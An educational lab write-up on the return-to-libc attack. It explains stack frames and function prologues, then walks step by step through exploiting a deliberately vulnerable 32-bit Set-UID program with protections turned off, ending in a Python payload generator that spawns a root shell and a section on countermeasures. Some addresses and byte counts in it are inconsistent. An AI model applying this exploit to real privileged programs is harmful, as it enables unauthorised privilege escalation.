# Return-to-libc attack By using buffer overflow attack, attacker can cause a program to jump to shellcode and execute it. To prevent this, some operating systems, such as Fedora Linux, allow system administrators to make stacks non-executable; therefore, jumping to the shellcode will cause the program to fail. Unfortunately, the above protection scheme is not fool-proof. There exists another type of attacks, the **return-to-libc attack**, which does not need an executable stack; it does not even use shell code. Instead, it causes the vulnerable program to jump to some existing code, such as the `system()` function in the `libc` library, which is already loaded into the memory. ## Prerequisites ### The `system` function The `system` function is a function of `libc` library. The way it work is simple. First it invoke new shell process, then it passes its first argument as the command of this new shell. The new shell then execute this command. What make the `system` vulnerable is that the effective user ID of the invoke shell is the same with its parent process. Therefore, if we call `system("/bin/sh")` in a privileged program, the invoked shell will have privileged permission, and then the command executed by it will also have privileged permission. For example, malicious user can call `system("/bin/sh")` in a Set-UID program to invoke a privileged shell and use it to harm our system. ![](https://i.imgur.com/BE6o6oD.png) ### Activation record Every function has its own space and this space has structure. This space is called activation record. The structure of the activation record is simple. We will placed our origin at the `ebp` pointer. The `ebp` pointer to the previous `ebp` value. Right above the `ebp` is the return address, then comes the first argument of the function, then the second, the third, etc. Right below the `ebp` is the first local variable, then the second, the third, etc. For example, if we have this function ```C++ void ARDemo (int k, int j, int i) { int a; float r; char c; bool b; short w; // ... } ``` Then its activation record when the function is executed will look like this picture below: ![](https://i.imgur.com/tNEnBQU.gif) ### Function prologue and epilogue To insert an argument for malicious function into memory, we need to know exactly how a function memory will allocated as well as deallocated. To achieve this, instruction often call a piece of code when entering and exiting a function, such of that is called function prologue and epilogue. **Function prologue**: This assembly code will be called every time a function is invoked: ``` pushl %ebp // Save caller's frame pointer movl %esp, %ebp // / et callee's frame pointer subl $N, %esp // Save space for the local variables ``` Before these code is run, the return address (denoted as `RA`) has been pushed into the stack and the stack pointer `esp` were pointing to this address. Next, the first instruction `pushl %ebp` will push the value of previous frame pointer `ebp` (frame pointer of the caller) into stack, so when the function returns, the caller's frame pointer can be recovered. After that, the second instruction now set the frame pointer `ebp` to current frame, which mean the value of the stack pointer `esp`. The third instruction move stack pointer `esp` by $N$ bytes to preserve the function's local variable space. ![](https://i.imgur.com/kLHFN3L.png) **Function epilogue**: like the prologue, function epilogue is called every time the function return: ``` movl %ebp, %esp popl %ebp ret ``` This is the inverse the prologue does, so the previous context can be restored. The first instruction move the stack pointer to frame pointer, which is the end of stack. Next instruction restore `ebp` to its previous value. The last instruction pips the return address from the stack and then jumps to it. ![](https://i.imgur.com/MjdFKrP.png) ## How the attack happen? ### Overview There is a region in the memory where plenty of code can be found. It is the region for the standard C library functions. In Linux, the library is called `libc`, which is a dynamic link library. Most programs use the functions inside the `libc` library, so before these programs start running, the operating system will load the `libc` library into memory. So which function in `libc` can help attacker achieve their malicious goal? Several such functions exist inside `libc`, the easiest one to use is `system()` function. `system()` function simply invoke a new shell and executes the string argument it is passed by that shell. At this time, we just need to pass the string `"/bin/sh"` to `system()` and it will spawn new privileged shell since our parent process is a Set-UID program. Besides the `system()` function, there exists a lot of difference function that can do harm to our system, such as `execv()` function, `setuid()` function, etc. ### Experiment Since the return-to-libc attack on 64-bit machine is much more difficult than on the 32-bit one, we decide to make a demonstration on 32-bit machine for simplicity. Assume that we have the following program: ```C++ #include <stdlib.h> #include <stdio.h> #include <string.h> #ifndef BUF_SIZE #define BUF_SIZE 12 #endif int bof(char *str) { char buffer[BUF_SIZE]; unsigned int *framep; strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char input[1000]; FILE *badfile; badfile = fopen("badfile", "r"); int length = fread(input, sizeof(char), 1000, badfile); bof(input); return 1; } ``` This program is vulnerable. First, it read $300$ byte from the file named `badfile`. Then, it pass the string `str` into `bof` function. After that,`str` is copied into a function variable `buffer`. However, `buffer` has just `12` memory space, therefore the overflow will happen. Assume that the program has been compiled with option `-z noexecstack` (which mean the stack is turned non-executable), so we cannot insert a shellcode and jump to it. Here is where the return-to-libc attack come. The attack will come with $4$ step: 1. Find the address of `system()` function 2. Find the address of `"/bin/sh"` 3. Find where exactly we should place the address 4. Generate `badfile` content and perform the attack #### Setup For doing this experiment, some countermeasures need to be turned off. - Address Space Randomization ``` $ sudo sysctl -w kernel.randomize_va_space=0 ``` - The StackGuard Protection Scheme ``` gcc -m32 -fno-stack-protector example.c ``` - Configuring `/bin/sh`: In Ubuntu 20.04, the `/bin/sh` symbolic link points to the `/bin/dash` shell.The `dash` shell has a countermeasure that prevents itself from being executed in a Set-UID process. Therefore, we have to link the `/bin/sh` to `/bin/zsh` ``` $ sudo ln -sf /bin/zsh /bin/sh ``` #### Step 1: Find the address of `system()` function In Linux, the`libc` library is loaded into program memory at runtime. When the memory address randomization is turned off, the library's address in one program is remained unchanged no matter how many time you run it (but it can differ between programs). Therefore, we can easily find out the address of the `system()` using debugging tool such as `gdb`. First, we create an empty `badfile` file for debugging: ``` $ touch badfile ``` Next, we compile a file with debug flag, remember to add option `-m32` to compile with 32-bit architecture and other option for turn off coutermeasures: ``` $ gcc -m32 -fno-stack-protector -z noexecstack -g -o retlib_dbg retlib.c ``` Then, we make a a program Set-UID program. It should be noted that even for the same program, if we change it from a Set-UID program to a non-Set-UID program, the libc library may not be loaded into the same location. Therefore, when we debug the program, we need to debug the target Set-UID program: ``` $ sudo chowm root retlib_dbg $ sudo chmod 4755 retlib_dbg ``` After that, we just need to debug a program, set a breakpoint at `main` function, run the program and print out the address: ``` $ gdb -q retlib_dbg gdb-peda$ b main Breakpoint 1 at 0x12ef: file retlib.c, line 33 gdb-peda$ run gdb-peda$ p system 0xf7e12420 ``` #### Step 2: Find the address of `"/bin/sh"` Now we just have address of `system()` function, next we will find out the address of its argument - a string `"/bin/sh"` - since we want to call `system("/bin/sh")` to invoke a privileged shell. There are many ways to achieve this goal and we choose a environment variable method. Let us define a new shell variable `MYSHELL="/bin/sh"` and mark it as export for turning it into environment variable of program. ``` $ export MYSHELL=/bin/sh ``` The location of this variable in the memory can be found out easily using the following program: ```C++ void main(){ char* shell = getenv("MYSHELL"); if (shell) printf("%x\n", (unsigned int)shell); } ``` Compile the code above into a binary called `prtenv`. Remember that this program name must have same number of letters as the target program (here `retlib` program) since the name of a program will be pushed into stack before environment variables, therefore different length of names can cause different addresses of environment variables in the program: ``` $ gcc -m32 -o prtenv prtenv.c ``` Run the program, we will have address of our needed string: ``` $ ./prtenv ffffd0d7 ``` #### Step 3: Find where exactly we should place the address First, we should know the distance from the `buffer` to the `ebp` pointer. We can achieve this easily by debug the program: ``` $ gdb -q retlib_dbg gdb-peda$ b bof gdb-peda$ run gdb-peda$ next gdb-peda$ p $ebp 0xffffc9c8 gdb-peda$ p &buffer 0xffffc9b0 gdb-peda$ p/d 0xffffc9c8 - 0xffffc9b0 24 ``` Next, we know that the return address is placed right after `ebp`, so we will put it at the `24 + 4 = 28`-th character of the string. After the function epilogue of `bof` is called, the stack pointer will be at the address right above where the return address was stored. Then, it jump to the function prologue of `system()` function, at this time the previous`ebp` is added to stack and move `esp` by $4$ bytes downward. The second isntruction of prologue now point the `ebp` to `esp`. At that point, based on the activation record structure, we know that before `ebp` is the return address and before the return address is the function argument, from first to last. By that, we conclude the `"/bin/sh"` placed in `buffer` is `28 + 4 + 4 = 36`-th character. The program will jump to an invalid address after we run the system function, unless we specify the return address for `system` function. Therefore, we need to find the address of the `exit` function in the program (the same way as finding `system` function address), then put it at the `28 + 4 = 32`-th byte of the character. The above analysis can be visualize by this picture. ![](https://i.imgur.com/huSHNcZ.png) #### Step 4: Generate `badfile` content and perform the attack The last thing we have to do is to construct the `badfile` content based on our analysis. We will use a Python program to generate it: ```python #!/usr/bin/env python3 import sys # Fill content with non-zero values content = bytearray(0xaa for i in range(300)) X = 36 sh_addr = 0xffffd2e7 # The address of "/bin/sh" content[X:X+4] = (sh_addr).to_bytes(4,byteorder='little') Y = 28 system_addr = 0xf7e12420 # The address of system() content[Y:Y+4] = (system_addr).to_bytes(4,byteorder='little') Z = 32 exit_addr = 0xf7e04f80 # The address of exit() content[Z:Z+4] = (exit_addr).to_bytes(4,byteorder='little') # Save content to a file with open("badfile", "wb") as f: f.write(content) ``` The last thing we have to do is just run the program and enjoy the result: ``` $ python3 exploit.py $ ./retlib # ``` ## Countermeasures There are lot of things to counter this attack. First one is address space randomization, the OS can take advantage of this to make the starting address of heap and stack changed every time you run the program. Therefore, it is much harder to guess the address of `system()` function and other addresses. Second one is Stack-Guard to prevent buffer overflows implemented by the `gcc` compiler. In the presence of this protection, buffer overflow attacks do not work. Next, the `/bin/dash` shell has a countermeasure that prevents itself from being executed in a Set-UID process. If `dash` executed in a Set-UID process, it immediately changes the effective user ID to the process's real userID, essentially dropping its privilege. The last one is ASCII armoring. With this, all the system libraries (e.g. libc) addresses contain a `NULL` byte (`0x00`). So when a string is read with string-based function like `strcpy`, it will terminate at this `NULL` bytes, prevent the overflow attack.